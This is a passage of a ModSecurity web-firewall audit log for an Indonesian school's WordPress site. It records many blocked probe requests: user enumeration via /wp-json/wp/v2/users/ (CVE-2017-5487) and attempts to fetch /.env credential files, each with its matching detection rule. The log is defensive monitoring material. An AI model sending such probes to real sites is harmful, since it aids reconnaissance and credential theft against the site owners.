4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747607711637013 3473 (- - -) Stopwatch2: 1747607711637013 3473; combined=1538, p1=533, p2=973, p3=0, p4=0, p5=31, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c00b4015-Z-- --219c8061-A-- [19/May/2025:06:05:26 +0700] aCpntmyGBQNQTJej4E58TQAAAIQ 103.236.140.4 43774 103.236.140.4 8181 --219c8061-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --219c8061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --219c8061-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747609526966835 3488 (- - -) Stopwatch2: 1747609526966835 3488; combined=1520, p1=546, p2=943, p3=0, p4=0, p5=31, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219c8061-Z-- --fb4bb43d-A-- [19/May/2025:06:36:11 +0700] aCpu678BMImlI6dyVePLZgAAANQ 103.236.140.4 45292 103.236.140.4 8181 --fb4bb43d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb4bb43d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb4bb43d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747611371510113 2905 (- - -) Stopwatch2: 1747611371510113 2905; combined=1242, p1=418, p2=800, p3=0, p4=0, p5=24, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb4bb43d-Z-- --79779752-A-- [19/May/2025:06:49:23 +0700] aCpyA78BMImlI6dyVePM_gAAANA 103.236.140.4 47692 103.236.140.4 8181 --79779752-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.100.25.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.100.25.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --79779752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79779752-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747612163638153 3211 (- - -) Stopwatch2: 1747612163638153 3211; combined=1308, p1=441, p2=837, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79779752-Z-- --c1004e19-A-- [19/May/2025:06:56:34 +0700] aCpzsjuVdcwZ_qZ5ZIocZgAAAAc 103.236.140.4 47738 103.236.140.4 8181 --c1004e19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.254.186.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.254.186.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1004e19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1004e19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747612594766864 3430 (- - -) Stopwatch2: 1747612594766864 3430; combined=1478, p1=488, p2=953, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1004e19-Z-- --4a8ccf13-A-- [19/May/2025:07:48:26 +0700] aCp_2r8BMImlI6dyVePRBQAAAM8 103.236.140.4 36134 103.236.140.4 8181 --4a8ccf13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4a8ccf13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a8ccf13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747615706983908 841 (- - -) Stopwatch2: 1747615706983908 841; combined=352, p1=305, p2=0, p3=0, p4=0, p5=47, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a8ccf13-Z-- --35b3c97a-A-- [19/May/2025:07:48:28 +0700] aCp_3L8BMImlI6dyVePRBwAAANU 103.236.140.4 36138 103.236.140.4 8181 --35b3c97a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.207.37.51 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.207.37.51 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --35b3c97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35b3c97a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747615708434693 701 (- - -) Stopwatch2: 1747615708434693 701; combined=296, p1=264, p2=0, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35b3c97a-Z-- --167fd06e-A-- [19/May/2025:08:37:16 +0700] aCqLTAZaP57SewDBUi9DHwAAAEs 103.236.140.4 36518 103.236.140.4 8181 --167fd06e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.97.99.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.97.99.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --167fd06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --167fd06e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747618636978940 3420 (- - -) Stopwatch2: 1747618636978940 3420; combined=1523, p1=550, p2=942, p3=0, p4=0, p5=31, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --167fd06e-Z-- --8ee37b6d-A-- [19/May/2025:08:39:00 +0700] aCqLtGyGBQNQTJej4E6KCAAAAJM 103.236.140.4 36540 103.236.140.4 8181 --8ee37b6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.66.230.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.66.230.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ee37b6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee37b6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747618740177883 3451 (- - -) Stopwatch2: 1747618740177883 3451; combined=1516, p1=544, p2=941, p3=0, p4=0, p5=31, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee37b6d-Z-- --da6f4546-A-- [19/May/2025:09:36:31 +0700] aCqZL78BMImlI6dyVePR-wAAAME 103.236.140.4 38650 103.236.140.4 8181 --da6f4546-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 135.181.153.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 135.181.153.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da6f4546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da6f4546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747622191758519 2951 (- - -) Stopwatch2: 1747622191758519 2951; combined=1293, p1=438, p2=826, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da6f4546-Z-- --00b5e226-A-- [19/May/2025:09:39:31 +0700] aCqZ42yGBQNQTJej4E6LNgAAAIM 103.236.140.4 38688 103.236.140.4 8181 --00b5e226-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.225.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.225.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00b5e226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00b5e226-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747622371198590 3138 (- - -) Stopwatch2: 1747622371198590 3138; combined=1348, p1=486, p2=834, p3=0, p4=0, p5=28, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00b5e226-Z-- --3b7cef34-A-- [19/May/2025:09:46:05 +0700] aCqbbTuVdcwZ_qZ5ZIol_QAAAAo 103.236.140.4 38750 103.236.140.4 8181 --3b7cef34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.227.154.122 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.227.154.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3b7cef34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b7cef34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747622765025897 877 (- - -) Stopwatch2: 1747622765025897 877; combined=395, p1=355, p2=0, p3=0, p4=0, p5=40, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b7cef34-Z-- --fcb4d81c-A-- [19/May/2025:09:51:00 +0700] aCqclDuVdcwZ_qZ5ZIomAQAAAAU 103.236.140.4 38776 103.236.140.4 8181 --fcb4d81c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.10.59.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.10.59.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fcb4d81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb4d81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747623060911936 3162 (- - -) Stopwatch2: 1747623060911936 3162; combined=1329, p1=459, p2=835, p3=0, p4=0, p5=35, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb4d81c-Z-- --fcb4d81c-A-- [19/May/2025:10:09:38 +0700] aCqg8gZaP57SewDBUi9EQwAAAFc 103.236.140.4 38902 103.236.140.4 8181 --fcb4d81c-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fcb4d81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb4d81c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747624178301977 831 (- - -) Stopwatch2: 1747624178301977 831; combined=342, p1=306, p2=0, p3=0, p4=0, p5=36, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb4d81c-Z-- --55deed78-A-- [19/May/2025:10:20:27 +0700] aCqjewZaP57SewDBUi9ETQAAAEs 103.236.140.4 38950 103.236.140.4 8181 --55deed78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.190.235.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.190.235.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55deed78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55deed78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747624827662624 3249 (- - -) Stopwatch2: 1747624827662624 3249; combined=1427, p1=568, p2=830, p3=0, p4=0, p5=29, sr=180, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55deed78-Z-- --c759b16d-A-- [19/May/2025:10:33:28 +0700] aCqmiGyGBQNQTJej4E6LYQAAAIQ 103.236.140.4 39004 103.236.140.4 8181 --c759b16d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.15.91.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.15.91.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c759b16d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c759b16d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747625608046976 24720 (- - -) Stopwatch2: 1747625608046976 24720; combined=2906, p1=1409, p2=1457, p3=0, p4=0, p5=40, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c759b16d-Z-- --c579c17d-A-- [19/May/2025:11:04:32 +0700] aCqt0GyGBQNQTJej4E6N6QAAAIo 103.236.140.4 47866 103.236.140.4 8181 --c579c17d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.245.205.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.245.205.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c579c17d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c579c17d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747627472932606 2442 (- - -) Stopwatch2: 1747627472932606 2442; combined=1069, p1=365, p2=681, p3=0, p4=0, p5=23, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c579c17d-Z-- --4c9bc631-A-- [19/May/2025:11:50:49 +0700] aCq4qWyGBQNQTJej4E6wsAAAAIA 103.236.140.4 60930 103.236.140.4 8181 --4c9bc631-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.124.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.124.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c9bc631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c9bc631-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747630249417011 2677 (- - -) Stopwatch2: 1747630249417011 2677; combined=1248, p1=444, p2=773, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c9bc631-Z-- --5cdc520a-A-- [19/May/2025:12:11:53 +0700] 